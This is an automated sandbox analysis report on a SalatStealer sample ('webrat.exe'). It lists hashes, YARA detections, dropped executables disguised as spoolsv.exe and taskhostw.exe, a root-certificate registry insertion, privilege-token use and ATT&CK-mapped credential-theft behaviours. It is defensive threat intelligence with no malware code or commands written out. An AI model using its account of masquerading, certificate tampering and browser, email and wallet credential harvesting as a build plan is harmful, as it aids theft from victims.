salatstealer | 18c5e65e4b9da90324c170b3f5f20a1dc8c818b38dcde6b146c3af1f423def3f

Analysis

max time kernel
594s
max time network
598s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
27/03/2025, 19:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

webrat.exe
Size

3.1MB
MD5

1c3b8bd025d5b9663dd0e02d3405e0df
SHA1

92b07502328992e7fc21a11fac39f93cceffeb22
SHA256

18c5e65e4b9da90324c170b3f5f20a1dc8c818b38dcde6b146c3af1f423def3f
SHA512

a49523270de2a235aedbd1698d01a70f6d4967e06287e8b8630b1b11758bdb56507fc066d6d404e850e60c6fd9ef2cb075fa3d7085bc24ce9b946d306ff396cb
SSDEEP

49152:zRlpygxOgF2Kxw/EnMr+NQdiFyBEQhJHZRPsy4jFwlBJm+/D9cEmbvvF:VlpyWOXKxw8n8/gMBEQ3sTAtRObv

Score

10^/10

salatstealer credential_access discovery execution spyware stealer upx

Malware Config

Signatures

Detect SalatStealer payload 64 IoCs

resource	yara_rule
behavioral1/memory/1756-9-0x0000000000FF0000-0x0000000001B6C000-memory.dmp	family_salatstealer
behavioral1/memory/5108-15-0x0000000000CE0000-0x000000000185C000-memory.dmp	family_salatstealer
behavioral1/memory/5268-21-0x0000000000DF0000-0x000000000196C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-22-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-23-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-24-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-25-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-26-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-27-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-28-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-30-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4092-35-0x0000000000550000-0x00000000010CC000-memory.dmp	family_salatstealer
behavioral1/memory/4740-41-0x0000000000380000-0x0000000000EFC000-memory.dmp	family_salatstealer
behavioral1/memory/4532-43-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-44-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-45-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-46-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-47-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-48-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4572-53-0x0000000000620000-0x000000000119C000-memory.dmp	family_salatstealer
behavioral1/memory/5104-59-0x0000000000620000-0x000000000119C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-82-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-165-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-168-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-169-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-170-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-171-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-172-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/2020-176-0x0000000000860000-0x00000000013DC000-memory.dmp	family_salatstealer
behavioral1/memory/5708-177-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-178-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-179-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-180-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-181-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-182-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-183-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-184-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-185-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-186-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-187-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-188-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-189-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-190-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-191-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-192-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-193-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-194-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-195-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-196-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-197-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-198-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-199-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-200-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-201-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-202-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-203-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-204-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-205-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-206-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-207-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-208-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-209-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/5512-210-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer
behavioral1/memory/4532-211-0x0000000000010000-0x0000000000B8C000-memory.dmp	family_salatstealer

Salatstealer family
salatstealer
salatstealer
SalatStealer is a stealer that takes sceenshot written in Golang.
stealer salatstealer

Executes dropped EXE 14 IoCs

pid	Process
4532	spoolsv.exe
5108	spoolsv.exe
5268	spoolsv.exe
4092	spoolsv.exe
4740	spoolsv.exe
4572	spoolsv.exe
5104	spoolsv.exe
5512	spoolsv.exe
2020	taskhostw.exe
5708	spoolsv.exe
1324	taskhostw.exe
4692	spoolsv.exe
3384	taskhostw.exe
5240	spoolsv.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5100	powershell.exe
5048	powershell.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1756-0-0x0000000000FF0000-0x0000000001B6C000-memory.dmp	upx
behavioral1/files/0x00070000000242d1-5.dat	upx
behavioral1/memory/4532-8-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/1756-9-0x0000000000FF0000-0x0000000001B6C000-memory.dmp	upx
behavioral1/memory/5108-14-0x0000000000CE0000-0x000000000185C000-memory.dmp	upx
behavioral1/memory/5108-15-0x0000000000CE0000-0x000000000185C000-memory.dmp	upx
behavioral1/memory/5268-20-0x0000000000DF0000-0x000000000196C000-memory.dmp	upx
behavioral1/memory/5268-21-0x0000000000DF0000-0x000000000196C000-memory.dmp	upx
behavioral1/memory/4532-22-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-23-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-24-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-25-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-26-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-27-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-28-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-30-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4092-34-0x0000000000550000-0x00000000010CC000-memory.dmp	upx
behavioral1/memory/4092-35-0x0000000000550000-0x00000000010CC000-memory.dmp	upx
behavioral1/memory/4740-40-0x0000000000380000-0x0000000000EFC000-memory.dmp	upx
behavioral1/memory/4740-41-0x0000000000380000-0x0000000000EFC000-memory.dmp	upx
behavioral1/memory/4532-43-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-44-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-45-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-46-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-47-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-48-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4572-52-0x0000000000620000-0x000000000119C000-memory.dmp	upx
behavioral1/memory/4572-53-0x0000000000620000-0x000000000119C000-memory.dmp	upx
behavioral1/memory/5104-58-0x0000000000620000-0x000000000119C000-memory.dmp	upx
behavioral1/memory/5104-59-0x0000000000620000-0x000000000119C000-memory.dmp	upx
behavioral1/memory/4532-82-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-165-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-168-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-169-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-170-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-171-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-172-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/2020-176-0x0000000000860000-0x00000000013DC000-memory.dmp	upx
behavioral1/memory/5708-177-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-178-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-179-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-180-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-181-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-182-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-183-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-184-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-185-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-186-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-187-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-188-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-189-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-190-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-191-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-192-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-193-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-194-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-195-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-196-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-197-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-198-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-199-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-200-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/4532-201-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx
behavioral1/memory/5512-202-0x0000000000010000-0x0000000000B8C000-memory.dmp	upx

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\spoolsv.exe	spoolsv.exe
File created	C:\Program Files (x86)\Microsoft\taskhostw.exe	webrat.exe
File opened for modification	C:\Program Files (x86)\Microsoft\taskhostw.exe	webrat.exe
File created	C:\Program Files\Google\Chrome\Application\spoolsv.exe	spoolsv.exe
File created	C:\Program Files (x86)\Microsoft\4e90f1aa-163b-1f1c-4a71-b290edcaaa16	webrat.exe
File created	C:\Program Files (x86)\Windows NT\4e90f1aa-163b-1f1c-4a71-b290edcaaa16	webrat.exe
File created	C:\Program Files (x86)\Windows NT\spoolsv.exe	webrat.exe
File opened for modification	C:\Program Files (x86)\Windows NT\spoolsv.exe	webrat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	webrat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	spoolsv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	spoolsv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	spoolsv.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1756	webrat.exe
1756	webrat.exe
1756	webrat.exe
1756	webrat.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
5108	spoolsv.exe
5108	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
5268	spoolsv.exe
5268	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4092	spoolsv.exe
4092	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe
4532	spoolsv.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4532	spoolsv.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	4532	spoolsv.exe
Token: SeDebugPrivilege	4532	spoolsv.exe
Token: SeDebugPrivilege	4532	spoolsv.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	6028	powershell.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5512	spoolsv.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 1756 wrote to memory of 4532	1756	webrat.exe	91
PID 1756 wrote to memory of 4532	1756	webrat.exe	91
PID 1756 wrote to memory of 4532	1756	webrat.exe	91
PID 4532 wrote to memory of 5108	4532	spoolsv.exe	95
PID 4532 wrote to memory of 5108	4532	spoolsv.exe	95
PID 4532 wrote to memory of 5108	4532	spoolsv.exe	95
PID 4532 wrote to memory of 5268	4532	spoolsv.exe	97
PID 4532 wrote to memory of 5268	4532	spoolsv.exe	97
PID 4532 wrote to memory of 5268	4532	spoolsv.exe	97
PID 4532 wrote to memory of 4092	4532	spoolsv.exe	112
PID 4532 wrote to memory of 4092	4532	spoolsv.exe	112
PID 4532 wrote to memory of 4092	4532	spoolsv.exe	112
PID 4532 wrote to memory of 4740	4532	spoolsv.exe	114
PID 4532 wrote to memory of 4740	4532	spoolsv.exe	114
PID 4532 wrote to memory of 4740	4532	spoolsv.exe	114
PID 4532 wrote to memory of 4572	4532	spoolsv.exe	116
PID 4532 wrote to memory of 4572	4532	spoolsv.exe	116
PID 4532 wrote to memory of 4572	4532	spoolsv.exe	116
PID 4532 wrote to memory of 5104	4532	spoolsv.exe	118
PID 4532 wrote to memory of 5104	4532	spoolsv.exe	118
PID 4532 wrote to memory of 5104	4532	spoolsv.exe	118
PID 4532 wrote to memory of 2672	4532	spoolsv.exe	120
PID 4532 wrote to memory of 2672	4532	spoolsv.exe	120
PID 4532 wrote to memory of 2672	4532	spoolsv.exe	120
PID 4532 wrote to memory of 5044	4532	spoolsv.exe	122
PID 4532 wrote to memory of 5044	4532	spoolsv.exe	122
PID 4532 wrote to memory of 5044	4532	spoolsv.exe	122
